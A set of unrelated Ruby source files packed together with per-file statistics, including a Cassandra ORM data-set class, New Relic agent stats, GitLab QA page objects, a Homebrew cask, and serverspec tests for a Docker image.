app.rodauth.unlock_account_request(:account_login=>'[email protected]').must_be_nil
link2 = email_link(/(\/unlock-account\?key=.+)$/)
link2.must_equal link
visit link
click_button 'Unlock Account'
page.find('#notice_flash').text.must_equal 'Your account has been unlocked'
page.body.must_include("Logged In")
logout
app.rodauth.lock_account(:account_login=>'[email protected]').must_be_nil
login
page.find('#error_flash').text.must_equal "This account is currently locked out and cannot be logged in to"
app.rodauth.unlock_account(:account_login=>'[email protected]').must_be_nil
login
page.body.must_include 'Logged In'
app.rodauth.lock_account(:account_login=>'[email protected]').must_be_nil
app.rodauth.unlock_account_request(:account_login=>'[email protected]').must_be_nil
link3 = email_link(/(\/unlock-account\?key=.+)$/)
link3.wont_equal link2
key = link3.split('=').last
proc do
app.rodauth.unlock_account(:unlock_account_key=>key[0...-1])
end.must_raise Rodauth::InternalRequestError
app.rodauth.unlock_account(:unlock_account_key=>key).must_be_nil
login
page.body.must_include 'Logged In'
end
end
| 35.122951 | 161 | 0.680358 |
b95248b6ad61ee134ac8c1987d2ed074fed07798 | 24,809 | # -*- encoding : utf-8 -*-
require 'forwardable'
module Cequel
module Metal
#
# Encapsulates a data set, specified as a table and optionally
# various query elements.
#
# @example Data set representing entire contents of a table
# data_set = database[:posts]
#
# @example Data set limiting rows returned
# data_set = database[:posts].limit(10)
#
# @example Data set targeting only one partition
# data_set = database[:posts].where(blog_subdomain: 'cassandra')
#
# @see http://cassandra.apache.org/doc/cql3/CQL.html#selectStmt
# CQL documentation for SELECT
#
class DataSet
include Enumerable
extend Util::Forwardable
# @return [Keyspace] keyspace that this data set's table resides in
attr_reader :keyspace
# @return [Symbol] name of the table that this data set retrieves data
# from
attr_reader :table_name
# @return [Array<Symbol>] columns that this data set restricts result
# rows to; empty if none
attr_reader :select_columns
# @return [Array<Symbol>] columns that this data set will select the TTLs
# of
attr_reader :ttl_columns
# @return [Array<Symbol>] columns that this data set will select the
# writetimes of
attr_reader :writetime_columns
# @return [Array<RowSpecification>] row specifications limiting the
# result rows returned by this data set
attr_reader :row_specifications
# @return [Hash<Symbol,Symbol>] map of column names to sort directions
attr_reader :sort_order
# @return [Integer] maximum number of rows to return, `nil` if no limit
attr_reader :row_limit
# @return [Symbol] what consistency level queries from this data set will
# use
# @since 1.1.0
attr_reader :query_consistency
attr_reader :query_page_size
attr_reader :query_paging_state
attr_reader :allow_filtering
def_delegator :keyspace, :write_with_options
#
# @param table_name [Symbol] column family for this data set
# @param keyspace [Keyspace] keyspace this data set's table lives in
#
# @see Keyspace#[]
# @api private
#
def initialize(table_name, keyspace)
@table_name, @keyspace = table_name, keyspace
@select_columns, @ttl_columns, @writetime_columns, @row_specifications,
@sort_order = [], [], [], [], {}
end
#
# Insert a row into the column family.
#
# @param data [Hash] column-value pairs
# @param options [Options] options for persisting the row
# @option (see Writer#initialize)
# @return [void]
#
# @note `INSERT` statements will succeed even if a row at the specified
# primary key already exists. In this case, column values specified in
# the insert will overwrite the existing row.
# @note If a enclosed in a Keyspace#batch block, this method will be
# executed as part of the batch.
# @see http://cassandra.apache.org/doc/cql3/CQL.html#insertStmt
# CQL documentation for INSERT
#
def insert(data, options = {})
inserter { insert(data) }.execute(options)
end
#
# Upsert data into one or more rows
#
# @overload update(column_values, options = {})
# Update the rows specified in the data set with new values
#
# @param column_values [Hash] map of column names to new values
# @param options [Options] options for persisting the column data
# @option (see #generate_upsert_options)
#
# @example
# posts.where(blog_subdomain: 'cassandra', permalink: 'cequel').
# update(title: 'Announcing Cequel 1.0')
#
# @overload update(options = {}, &block)
# Construct an update statement consisting of multiple operations
#
# @param options [Options] options for persisting the data
# @option (see #generate_upsert_options)
# @yield DSL context for adding write operations
#
# @see Updater
# @since 1.0.0
#
# @example
# posts.where(blog_subdomain: 'bigdata', permalink: 'cql').update do
# set(title: 'Announcing Cequel 1.0')
# list_append(categories: 'ORMs')
# end
#
# @return [void]
#
# @note `UPDATE` statements will succeed even if targeting a row that
# does not exist. In this case a new row will be created.
# @note This statement will fail unless one or more rows are fully
# specified by primary key using `where`
# @note If a enclosed in a Keyspace#batch block, this method will be
# executed as part of the batch.
# @see http://cassandra.apache.org/doc/cql3/CQL.html#updateStmt
# CQL documentation for UPDATE
#
def update(*args, &block)
if block
updater(&block).execute(args.extract_options!)
else
data = args.shift
updater { set(data) }.execute(args.extract_options!)
end
end
#
# Increment one or more counter columns
#
# @param deltas [Hash<Symbol,Integer>] map of counter column names to
# amount by which to increment each column
# @return [void]
#
# @example
# post_analytics.
# where(blog_subdomain: 'cassandra', permalink: 'cequel').
# increment(pageviews: 10, tweets: 2)
#
# @note This can only be used on counter tables
# @since 0.5.0
# @see #decrement
# @see http://cassandra.apache.org/doc/cql3/CQL.html#counters
# CQL documentation for counter columns
#
def increment(deltas, options = {})
incrementer { increment(deltas) }.execute(options)
end
alias_method :incr, :increment
#
# Decrement one or more counter columns
#
# @param deltas [Hash<Symbol,Integer>] map of counter column names to
# amount by which to decrement each column
# @return [void]
#
# @see #increment
# @see http://cassandra.apache.org/doc/cql3/CQL.html#counters
# CQL documentation for counter columns
# @since 0.5.0
#
def decrement(deltas, options = {})
incrementer { decrement(deltas) }.execute(options)
end
alias_method :decr, :decrement
#
# Prepend element(s) to a list in the row(s) matched by this data set.
#
# @param column [Symbol] name of list column to prepend to
# @param elements [Object,Array] one element or an array of elements to
# prepend
# @param options [Options] options for persisting the column data
# @option (see Writer#initialize)
# @return [void]
#
# @example
# posts.list_prepend(:categories, ['CQL', 'ORMs'])
#
# @note A bug (CASSANDRA-8733) exists in Cassandra versions 0.3.0-2.0.12 and 2.1.0-2.1.2 which
# will make elements appear in REVERSE ORDER in the list.
# @note If a enclosed in a Keyspace#batch block, this method will be
# executed as part of the batch.
# @see #list_append
# @see #update
#
def list_prepend(column, elements, options = {})
updater { list_prepend(column, elements) }.execute(options)
end
#
# Append element(s) to a list in the row(s) matched by this data set.
#
# @param column [Symbol] name of list column to append to
# @param elements [Object,Array] one element or an array of elements to
# append
# @param options [Options] options for persisting the column data
# @option (see Writer#initialize)
# @return [void]
#
# @example
# posts.list_append(:categories, ['CQL', 'ORMs'])
#
# @note If a enclosed in a Keyspace#batch block, this method will be
# executed as part of the batch.
# @see #list_append
# @see #update
# @since 1.0.0
#
def list_append(column, elements, options = {})
updater { list_append(column, elements) }.execute(options)
end
#
# Replace a list element at a specified index with a new value
#
# @param column [Symbol] name of list column
# @param index [Integer] which element to replace
# @param value [Object] new value at this index
# @param options [Options] options for persisting the data
# @option (see Writer#initialize)
# @return [void]
#
# @example
# posts.list_replace(:categories, 2, 'Object-Relational Mapper')
#
# @note if a enclosed in a Keyspace#batch block, this method will be
# executed as part of the batch.
# @see #update
# @since 1.0.0
#
def list_replace(column, index, value, options = {})
updater { list_replace(column, index, value) }.execute(options)
end
#
# Remove all occurrences of a given value from a list column
#
# @param column [Symbol] name of list column
# @param value [Object] value to remove
# @param options [Options] options for persisting the data
# @option (see Writer#initialize)
# @return [void]
#
# @example
# posts.list_remove(:categories, 'CQL3')
#
# @note If enclosed in a Keyspace#batch block, this method will be
# executed as part of the batch.
# @see #list_remove_at
# @see #update
# @since 1.0.0
#
def list_remove(column, value, options = {})
updater { list_remove(column, value) }.execute(options)
end
#
# @overload list_remove_at(column, *positions, options = {})
# Remove the value from a given position or positions in a list column
#
# @param column [Symbol] name of list column
# @param positions [Integer] position(s) in list to remove value from
# @param options [Options] options for persisting the data
# @option (see Writer#initialize)
# @return [void]
#
# @example
# posts.list_remove_at(:categories, 2)
#
# @note If enclosed in a Keyspace#batch block, this method will be
# executed as part of the batch.
# @see #list_remove
# @see #update
# @since 1.0.0
#
def list_remove_at(column, *positions)
options = positions.extract_options!
sorted_positions = positions.sort.reverse
deleter { list_remove_at(column, *sorted_positions) }.execute(options)
end
#
# @overload map_remove(column, *keys, options = {})
# Remove a given key from a map column
#
# @param column [Symbol] name of map column
# @param keys [Object] map key to remove
# @param options [Options] options for persisting the data
# @option (see Writer#initialize)
# @return [void]
#
# @example
# posts.map_remove(:credits, 'editor')
#
# @note If enclosed in a Keyspace#batch block, this method will be
# executed as part of the batch.
# @see #update
# @since 1.0.0
#
def map_remove(column, *keys)
options = keys.extract_options!
deleter { map_remove(column, *keys) }.execute(options)
end
#
# Add one or more elements to a set column
#
# @param column [Symbol] name of set column
# @param values [Object,Set] value or values to add
# @param options [Options] options for persisting the data
# @option (see Writer#initialize)
# @return [void]
#
# @example
# posts.set_add(:tags, 'cql3')
#
# @note If enclosed in a Keyspace#batch block, this method will be
# executed as part of the batch.
# @see #update
# @since 1.0.0
#
def set_add(column, values, options = {})
updater { set_add(column, values) }.execute(options)
end
#
# Remove an element from a set
#
# @param column [Symbol] name of set column
# @param value [Object] value to remove
# @param options [Options] options for persisting the data
# @option (see Writer#initialize)
# @return [void]
#
# @example
# posts.set_remove(:tags, 'cql3')
#
# @note If enclosed in a Keyspace#batch block, this method will be
# executed as part of the batch.
# @see #update
# @since 1.0.0
#
def set_remove(column, value, options = {})
updater { set_remove(column, value) }.execute(options)
end
#
# Update one or more keys in a map column
#
# @param column [Symbol] name of set column
# @param updates [Hash] map of map keys to new values
# @param options [Options] options for persisting the data
# @option (see Writer#initialize)
# @return [void]
#
# @example
# posts.map_update(:credits, 'editor' => 34)
#
# @note If enclosed in a Keyspace#batch block, this method will be
# executed as part of the batch.
# @see #update
# @since 1.0.0
#
def map_update(column, updates, options = {})
updater { map_update(column, updates) }.execute(options)
end
#
# @overload delete(options = {})
# Delete one or more rows from the table
#
# @param options [Options] options for persistence
# @option (See Writer#initialize)
#
# @example
# posts.where(blog_subdomain: 'cassandra', permalink: 'cequel').
# delete
#
# @overload delete(*columns, options = {})
# Delete data from given columns in the specified rows. This is
# equivalent to setting columns to `NULL` in an SQL database.
#
# @param columns [Symbol] columns to remove
# @param options [Options] options for persistence
# @option (see Writer#initialize)
#
# @example
# posts.where(blog_subdomain: 'cassandra', permalink: 'cequel').
# delete(:body)
#
# @overload delete(options = {}, &block)
# Construct a `DELETE` statement with multiple operations (column
# deletions, collection element removals, etc.)
#
# @param options [Options] options for persistence
# @option (see Writer#initialize)
# @yield DSL context for construction delete statement
#
# @example
# posts.where(blog_subdomain: 'bigdata', permalink: 'cql').delete do
# delete_columns :body
# list_remove_at :categories, 2
# end
#
# @see Deleter
#
# @return [void]
#
# @note If enclosed in a Keyspace#batch block, this method will be
# executed as part of the batch.
# @see http://cassandra.apache.org/doc/cql3/CQL.html#deleteStmt
# CQL documentation for DELETE
#
def delete(*columns, &block)
options = columns.extract_options!
if block
deleter(&block).execute(options)
elsif columns.empty?
deleter { delete_row }.execute(options)
else
deleter { delete_columns(*columns) }.execute(options)
end
end
#
# Select specified columns from this data set.
#
# @param columns [Symbol] columns columns to select
# @return [DataSet] new data set scoped to specified columns
#
def select(*columns)
clone.tap do |data_set|
data_set.select_columns.concat(columns.flatten)
end
end
#
# Return the remaining TTL for the specified columns from this data set.
#
# @param columns [Symbol] columns to select
# @return [DataSet] new data set scoped to specified columns
#
# @since 1.0.0
#
def select_ttl(*columns)
clone.tap do |data_set|
data_set.ttl_columns.concat(columns.flatten)
end
end
#
# Return the write time for the specified columns in the data set
#
# @param columns [Symbol] columns to select
# @return [DataSet] new data set scoped to specified columns
#
# @since 1.0.0
#
def select_writetime(*columns)
clone.tap do |data_set|
data_set.writetime_columns.concat(columns.flatten)
end
end
alias_method :select_timestamp, :select_writetime
#
# Select specified columns from this data set, overriding chained scope.
#
# @param columns [Symbol,Array] columns to select
# @return [DataSet] new data set scoped to specified columns
#
def select!(*columns)
clone.tap do |data_set|
data_set.select_columns.replace(columns.flatten)
end
end
#
# Filter this data set with a row specification
#
# @overload where(column_values)
# @param column_values [Hash] Map of column name to values to match
#
# @example
# database[:posts].where(title: 'Hey')
#
# @overload where(cql, *bind_vars)
# @param cql [String] CQL fragment representing `WHERE` statement
# @param bind_vars [Object] Bind variables for the CQL fragment
#
# @example
# DB[:posts].where('title = ?', 'Hey')
#
# @return [DataSet] New data set scoped to the row specification
#
def where(row_specification, *bind_vars)
clone.tap do |data_set|
data_set.row_specifications
.concat(build_row_specifications(row_specification, bind_vars))
end
end
#
# Replace existing row specifications
#
# @see #where
# @return [DataSet] New data set with only row specifications given
#
def where!(row_specification, *bind_vars)
clone.tap do |data_set|
data_set.row_specifications
.replace(build_row_specifications(row_specification, bind_vars))
end
end
#
# Limit the number of rows returned by this data set
#
# @param limit [Integer] maximum number of rows to return
# @return [DataSet] new data set scoped with given limit
#
def limit(limit)
clone.tap { |data_set| data_set.row_limit = limit }
end
#
# Control how the result rows are sorted
#
# @param pairs [Hash] Map of column name to sort direction
# @return [DataSet] new data set with the specified ordering
#
# @note The only valid ordering column is the first clustering column
# @since 1.0.0
#
def order(pairs)
clone.tap do |data_set|
data_set.sort_order.merge!(pairs.symbolize_keys)
end
end
# rubocop:disable LineLength
#
# Change the consistency for queries performed by this data set
#
# @param consistency [Symbol] a consistency level
# @return [DataSet] new data set tuned to the given consistency
#
# @see http://www.datastax.com/documentation/cassandra/2.0/cassandra/dml/dml_config_consistency_c.html
# @since 1.1.0
#
def consistency(consistency)
clone.tap do |data_set|
data_set.query_consistency = consistency
end
end
def page_size(page_size)
clone.tap do |data_set|
data_set.query_page_size = page_size
end
end
#
# @see RecordSet#allow_filtering!
#
def allow_filtering!
clone.tap do |data_set|
data_set.allow_filtering = true
end
end
def paging_state(paging_state)
clone.tap do |data_set|
data_set.query_paging_state = paging_state
end
end
#
# Exposes current paging state for stateless pagination
#
# @return [String] or nil
#
# @see http://docs.datastax.com/en/developer/ruby-driver/3.0/api/cassandra/result/#paging_state-instance_method
#
def next_paging_state
results.paging_state
end
#
# @return [Boolean] Returns whether no more pages are available
#
# @see http://docs.datastax.com/en/developer/ruby-driver/3.0/api/cassandra/result/#last_page?-instance_method
#
def last_page?
results.last_page?
end
# rubocop:enable LineLength
#
# Enumerate over rows in this data set. Along with #each, all other
# Enumerable methods are implemented.
#
# @overload each
# @return [Enumerator] enumerator for rows, if no block given
#
# @overload each(&block)
# @yield [Hash] result rows
# @return [void]
#
# @return [Enumerator,void]
#
def each
return enum_for(:each) unless block_given?
results.each { |row| yield Row.from_result_row(row) }
end
#
# @return [Hash] the first row in this data set
#
def first
row = execute_cql(*limit(1).cql).first
Row.from_result_row(row)
end
# @raise [DangerousQueryError] to prevent loading the entire record set
# to be counted
def count
raise Cequel::Record::DangerousQueryError.new
end
alias_method :length, :count
alias_method :size, :count
#
# @return [Statement] CQL `SELECT` statement encoding this data set's scope.
#
def cql
statement = Statement.new
.append(select_cql)
.append(" FROM #{table_name}")
.append(*row_specifications_cql)
.append(sort_order_cql)
.append(limit_cql)
.append(allow_filtering_cql)
end
#
# @return [String]
#
def inspect
"#<#{self.class.name}: #{cql.inspect}>"
end
#
# @return [Boolean]
#
def ==(other)
cql == other.cql
end
# @private
def row_specifications_cql
if row_specifications.any?
cql_fragments, bind_vars = [], []
row_specifications.each do |spec|
cql_with_vars = spec.cql
cql_fragments << cql_with_vars.shift
bind_vars.concat(cql_with_vars)
end
[" WHERE #{cql_fragments.join(' AND ')}", *bind_vars]
else ['']
end
end
# @private
def allow_filtering_cql
if allow_filtering
' ALLOW FILTERING'
else ''
end
end
attr_writer :row_limit, :query_consistency, :query_page_size, :query_paging_state, :allow_filtering
def results
@results ||= execute_cql(cql)
end
def execute_cql(cql_stmt)
keyspace.execute_with_options(cql_stmt,
consistency: query_consistency,
page_size: query_page_size,
paging_state: query_paging_state
)
end
def inserter(&block)
Inserter.new(self, &block)
end
def incrementer(&block)
Incrementer.new(self, &block)
end
def updater(&block)
Updater.new(self, &block)
end
def deleter(&block)
Deleter.new(self, &block)
end
private
def initialize_copy(source)
super
@select_columns = source.select_columns.clone
@ttl_columns = source.ttl_columns.clone
@writetime_columns = source.writetime_columns.clone
@row_specifications = source.row_specifications.clone
@sort_order = source.sort_order.clone
end
def select_cql
all_columns = select_columns +
ttl_columns.map { |column| "TTL(#{column})" } +
writetime_columns.map { |column| "WRITETIME(#{column})" }
if all_columns.any?
"SELECT #{all_columns.join(',')}"
else
'SELECT *'
end
end
def limit_cql
row_limit ? " LIMIT #{row_limit}" : ''
end
def sort_order_cql
if sort_order.any?
order = sort_order
.map { |column, direction| "#{column} #{direction.to_s.upcase}" }
.join(', ')
" ORDER BY #{order}"
end
end
def build_row_specifications(row_specification, bind_vars)
case row_specification
when Hash
RowSpecification.build(row_specification)
when String
CqlRowSpecification.build(row_specification, bind_vars)
else
fail ArgumentError,
"Invalid argument #{row_specification.inspect}; " \
"expected Hash or String"
end
end
end
end
end
| 31.80641 | 117 | 0.593011 |
6a61449f30eac1cf1d9277a8fbd8f099a93a2d13 | 1,663 | #-- encoding: UTF-8
#-- copyright
# OpenProject is a project management system.
# Copyright (C) 2012-2014 the OpenProject Foundation (OPF)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2013 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See doc/COPYRIGHT.rdoc for more details.
#++
module OpenProject
module Info
class << self
def app_name; Setting.software_name end
def url; Setting.software_url end
def help_url
"https://www.openproject.org/support"
end
def versioned_name; "#{app_name} #{Redmine::VERSION.to_semver}" end
# Creates the url string to a specific Redmine issue
def issue(issue_id)
url + 'issues/' + issue_id.to_s
end
end
end
end
| 35.382979 | 91 | 0.728803 |
79e075a740905172f5681bd269242a49b14b3ae5 | 4,620 | # encoding: utf-8
# This file is distributed under New Relic's license terms.
# See https://github.com/newrelic/newrelic-ruby-agent/blob/main/LICENSE for complete details.
module NewRelic
module Agent
class Stats
attr_accessor :call_count
attr_accessor :min_call_time
attr_accessor :max_call_time
attr_accessor :total_call_time
attr_accessor :total_exclusive_time
attr_accessor :sum_of_squares
def initialize
reset
end
def reset
@call_count = 0
@total_call_time = 0.0
@total_exclusive_time = 0.0
@min_call_time = 0.0
@max_call_time = 0.0
@sum_of_squares = 0.0
end
def is_reset?
call_count == 0 && total_call_time == 0.0 && total_exclusive_time == 0.0
end
def merge(other_stats)
stats = self.clone
stats.merge!(other_stats)
end
def merge!(other)
@min_call_time = other.min_call_time if min_time_less?(other)
@max_call_time = other.max_call_time if other.max_call_time > max_call_time
@total_call_time += other.total_call_time
@total_exclusive_time += other.total_exclusive_time
@sum_of_squares += other.sum_of_squares
@call_count += other.call_count
self
end
def to_s
"[#{'%2i' % call_count.to_i} calls #{'%.4f' % total_call_time.to_f}s / #{'%.4f' % total_exclusive_time.to_f}s ex]"
end
def to_json(*_)
{
'call_count' => call_count.to_i,
'min_call_time' => min_call_time.to_f,
'max_call_time' => max_call_time.to_f,
'total_call_time' => total_call_time.to_f,
'total_exclusive_time' => total_exclusive_time.to_f,
'sum_of_squares' => sum_of_squares.to_f
}.to_json(*_)
end
def record(value=nil, aux=nil, &blk)
if blk
yield self
else
case value
when Numeric
aux ||= value
self.record_data_point(value, aux)
when :apdex_s, :apdex_t, :apdex_f
self.record_apdex(value, aux)
when NewRelic::Agent::Stats
self.merge!(value)
end
end
end
# record a single data point into the statistical gatherer. The gatherer
# will aggregate all data points collected over a specified period and upload
# its data to the NewRelic server
def record_data_point(value, exclusive_time = value)
@call_count += 1
@total_call_time += value
@min_call_time = value if value < @min_call_time || @call_count == 1
@max_call_time = value if value > @max_call_time
@total_exclusive_time += exclusive_time
@sum_of_squares += (value * value)
self
end
alias trace_call record_data_point
# increments the call_count by one
def increment_count(value = 1)
@call_count += value
end
# Concerned about implicit usage of inspect relying on stats format, so
# putting back a version to get full inspection as separate method
def inspect_full
variables = instance_variables.map do |ivar|
"#{ivar.to_s}=#{instance_variable_get(ivar).inspect}"
end.join(" ")
"#<NewRelic::Agent::Stats #{variables}>"
end
def ==(other)
other.class == self.class &&
(
@min_call_time == other.min_call_time &&
@max_call_time == other.max_call_time &&
@total_call_time == other.total_call_time &&
@total_exclusive_time == other.total_exclusive_time &&
@sum_of_squares == other.sum_of_squares &&
@call_count == other.call_count
)
end
# Apdex-related accessors
alias_method :apdex_s, :call_count
alias_method :apdex_t, :total_call_time
alias_method :apdex_f, :total_exclusive_time
def record_apdex(bucket, apdex_t)
case bucket
when :apdex_s then @call_count += 1
when :apdex_t then @total_call_time += 1
when :apdex_f then @total_exclusive_time += 1
end
if apdex_t
@min_call_time = apdex_t
@max_call_time = apdex_t
else
::NewRelic::Agent.logger.warn("Attempted to set apdex_t to #{apdex_t.inspect}, backtrace = #{caller.join("\n")}")
end
end
protected
def min_time_less?(other)
(other.min_call_time < min_call_time && other.call_count > 0) || call_count == 0
end
end
end
end
| 31.643836 | 123 | 0.604113 |
616d50f47fcf888315ab84aaaeef10adc22e1bdc | 2,530 | # frozen_string_literal: true
module QA
module Page
module Main
class Menu < Page::Base
view 'app/views/layouts/header/_current_user_dropdown.html.haml' do
element :user_sign_out_link, 'link_to _("Sign out")' # rubocop:disable QA/ElementWithPattern
element :settings_link, 'link_to s_("CurrentUser|Settings")' # rubocop:disable QA/ElementWithPattern
end
view 'app/views/layouts/header/_default.html.haml' do
element :navbar
element :user_avatar
element :user_menu, '.dropdown-menu' # rubocop:disable QA/ElementWithPattern
end
view 'app/views/layouts/nav/_dashboard.html.haml' do
element :admin_area_link
element :projects_dropdown
element :groups_dropdown
end
view 'app/views/layouts/nav/projects_dropdown/_show.html.haml' do
element :projects_dropdown_sidebar
element :your_projects_link
end
def go_to_groups
within_top_menu do
click_element :groups_dropdown
end
page.within('.qa-groups-dropdown-sidebar') do
click_element :your_groups_link
end
end
def go_to_projects
within_top_menu do
click_element :projects_dropdown
end
page.within('.qa-projects-dropdown-sidebar') do
click_element :your_projects_link
end
end
def go_to_admin_area
within_top_menu { click_element :admin_area_link }
end
def sign_out
within_user_menu do
click_link 'Sign out'
end
end
def go_to_profile_settings
with_retry(reload: false) do
within_user_menu do
click_link 'Settings'
end
has_text?('User Settings')
end
end
def has_personal_area?(wait: Capybara.default_max_wait_time)
has_element?(:user_avatar, wait: wait)
end
def has_admin_area_link?(wait: Capybara.default_max_wait_time)
has_element?(:admin_area_link, wait: wait)
end
private
def within_top_menu
page.within('.qa-navbar') do
yield
end
end
def within_user_menu
within_top_menu do
click_element :user_avatar
page.within('.dropdown-menu') do
yield
end
end
end
end
end
end
end
| 25.816327 | 110 | 0.592885 |
7a45580c52a8dd227d2b02862087bb90ebec0e46 | 814 | cask 'sqlpro-studio' do
version '2020.39'
sha256 '8d578529ce7430ee8b81b75d7f9df094d5a6ca0d9ab18e0b06bc141141da9616'
# d3fwkemdw8spx3.cloudfront.net/studio/ was verified as official when first introduced to the cask
url "https://d3fwkemdw8spx3.cloudfront.net/studio/SQLProStudio.#{version}.app.zip"
appcast 'https://macupdater.net/cgi-bin/check_urls/check_url_redirect.cgi?user_agent=Macintosh&url=https://www.sqlprostudio.com/download.php'
name 'SQLPro Studio'
homepage 'https://www.sqlprostudio.com/'
app 'SQLPro Studio.app'
zap trash: [
'~/Library/Containers/com.hankinsoft.osx.sqlprostudio',
'~/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/com.hankinsoft.osx.sqlprostudio.sfl*',
]
end
| 45.222222 | 163 | 0.756757 |
08a3629832adcbbf1ce10b1b08f9680eb73c5d36 | 2,755 | require 'spec_helper'
require 'docker'
require 'serverspec'
BOSH_CLI_VERSION="6.4.1-35ce8438-2020-10-20T16:04:13Z"
CREDHUB_VERSION='2.8.0'
BOSH_ENV_DEPS = "build-essential zlibc zlib1g-dev openssl libxslt1-dev libxml2-dev \
libssl-dev libreadline7 libreadline-dev libyaml-dev libsqlite3-dev sqlite3"
describe "bosh-cli-v2 image" do
before(:all) {
set :docker_image, find_image_id('bosh-cli-v2:latest')
}
it "installs required packages" do
BOSH_ENV_DEPS.split(' ').each do |package|
expect(package(package)).to be_installed
end
end
it "has the expected version of the Bosh CLI" do
expect(
command("bosh -v").stdout.strip
).to eq("version #{BOSH_CLI_VERSION}")
end
it "has `file` available" do
expect(
command("file --version").exit_status
).to eq(0)
end
it "has ssh available" do
expect(
command("ssh -V").exit_status
).to eq(0)
end
it "can run git" do
expect(command('git --version').exit_status).to eq(0)
end
it "can run credhub" do
cmd = command('credhub --version')
expect(cmd.exit_status).to eq(0)
expect(cmd.stdout.match?(/#{CREDHUB_VERSION}/)).to eq(true)
end
it "has `bash` available" do
expect(
command("bash --version").exit_status
).to eq(0)
end
it "has a new enough version of openssl available" do
# wget (from busybox) requires openssl to be able to connect to https sites.
# See https://github.com/nahi/httpclient/blob/v2.7.1/lib/httpclient/ssl_config.rb#L441-L452
# (httpclient is a dependency of bosh_cli)
# With an older version of openssl, bosh_cli spits out warnings.
cmd = command("openssl version")
expect(cmd.exit_status).to eq(0)
ssl_version_str = cmd.stdout.strip
if ssl_version_str.start_with?('OpenSSL 1.0.1')
expect(ssl_version_str).to be >= 'OpenSSL 1.0.1p'
else
expect(ssl_version_str).to be >= 'OpenSSL 1.0.2d'
end
end
it "has ruby 2.7 available" do
cmd = command("ruby -v")
expect(cmd.exit_status).to eq(0)
expect(cmd.stdout).to match(/^ruby 2.7/)
end
it "contains the compiled CPI packages" do
installation_path = '/root/.bosh/installations/44f01911-a47a-4a24-6ca3-a3109b33f058'
packages_file = file("#{installation_path}/compiled_packages.json")
expect(packages_file).to exist
compiled_packages = JSON.parse(packages_file.content)
compiled_packages.each do |package|
expect(file("#{installation_path}/blobs/#{package["Value"]["BlobID"]}")).to exist
end
cpi_package = compiled_packages.find {|p| p["Key"]["PackageName"] == "bosh_aws_cpi" }
expect(cpi_package).to be
expect(file("#{installation_path}/packages/bosh_aws_cpi/bin/aws_cpi")).to be_executable
end
end
| 29.308511 | 95 | 0.685662 |
ff91ec241c2b7395533313b24ed70487bebced03 | 1,170 | require 'thor/shell/basic'
module GenSpec
# Just like a Thor::Shell::Basic except that input and output are both redirected to
# the specified streams. By default, these are initialized to instances of StringIO.
class Shell < Thor::Shell::Basic
attr_accessor :stdin, :stdout, :stderr
alias_method :input, :stdin
alias_method :input=, :stdin=
alias_method :output, :stdout
alias_method :output=, :stdout=
def ask(statement, color = nil)
say "#{statement} ", color
response = stdin.gets
if response
response.strip
else
raise "Asked '#{statement}', but input.gets returned nil!"
end
end
def initialize(output = "", input = "")
super()
new(output, input)
end
# Reinitializes this Shell with the given input and output streams.
def new(output="", input="")
init_stream(:output, output)
init_stream(:input, input)
@stderr = @stdout
self
end
private
def init_stream(which, value)
if value.kind_of?(String)
value = StringIO.new(value)
end
send("#{which}=", value)
end
end
end | 26 | 86 | 0.619658 |
6adf22346f2aed5fbc33964be404cbaffe9ae641 | 6,477 | require "json"
require "net/http"
require "digest"
class PerformancePlatformService
TRANSACTIONS_BY_CHANNEL_URL = "https://www.performance.service.gov.uk/data/queens-awards-for-enterprise/transactions-by-channel"
APPLICATIONS_BY_STAGE_URL = "https://www.performance.service.gov.uk/data/queens-awards-for-enterprise/applications-by-stage"
AWARD_TYPE_MAPPING = {
"trade" => "international-trade",
"innovation" => "innovation",
"development" => "sustainable-development",
"promotion" => "qaep"
}
POSSIBLE_RANGES = [
"100-percent",
"75-99-percent",
"50-74-percent",
"25-49-percent",
"1-24-percent",
"0-percent"
]
def self.run
log_this("started") unless Rails.env.test?
perform_transactions_by_channel
perform_applications_by_stage
log_this("completed") unless Rails.env.test?
end
#[
# {
# "_id": "23456780",
# "_timestamp": "2015-03-10T00:00:00Z",
# "period": "week",
# "channel": "online",
# "channel_type": "digital",
# "count": 42
# }
#]
def self.perform_transactions_by_channel
timestamp = (Time.current - 1.week).beginning_of_day.utc
form_answers_count = form_answers_for_past_week.submitted.count
result = {
"period" => "week",
"channel" => "online",
"channel_type" => "digital",
"count" => form_answers_count,
"_timestamp" => timestamp.iso8601
}
result["_id"] = generate_transactions_id(result)
perform_request(TRANSACTIONS_BY_CHANNEL_URL, [result])
end
#[
# {
# "_id": "23456789",
# "_timestamp": "2015-03-18T00:00:00Z",
# "period": "week",
# "award": "qaep",
# "stage": "1-24-percent",
# "count": 23,
# "cumulative_count": 30
# },
# {
# "_id": "23456780",
# "_timestamp": "2015-03-10T00:00:00Z",
# "period": "week",
# "award": "qaep",
# "stage": "0-percent",
# "count": 42,
# "cumulative_count": 72
# }
#]
def self.perform_applications_by_stage
payload = fetch_applications_data
perform_request(APPLICATIONS_BY_STAGE_URL, payload)
end
def self.perform_request(url, payload)
if ENV["PERFORMANCE_PLATFORM_TOKEN"].present?
headers = {
"Content-Type" =>"application/json",
"Authorization" => "Bearer #{ENV['PERFORMANCE_PLATFORM_TOKEN']}"
}
uri = URI(url)
req = Net::HTTP::Post.new(uri.path, headers)
req.body = payload.to_json
res = Net::HTTP.start(uri.host, uri.port, use_ssl: true) do |http|
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
http.ssl_version = :SSLv3
http.request req
end
puts res.body
nil
end
end
def self.fetch_applications_data
result = []
timestamp = (Time.current - 1.week).beginning_of_day.utc
AWARD_TYPE_MAPPING.each do |award_type, award|
POSSIBLE_RANGES.each do |stage|
case stage
when "0-percent"
count = form_answers
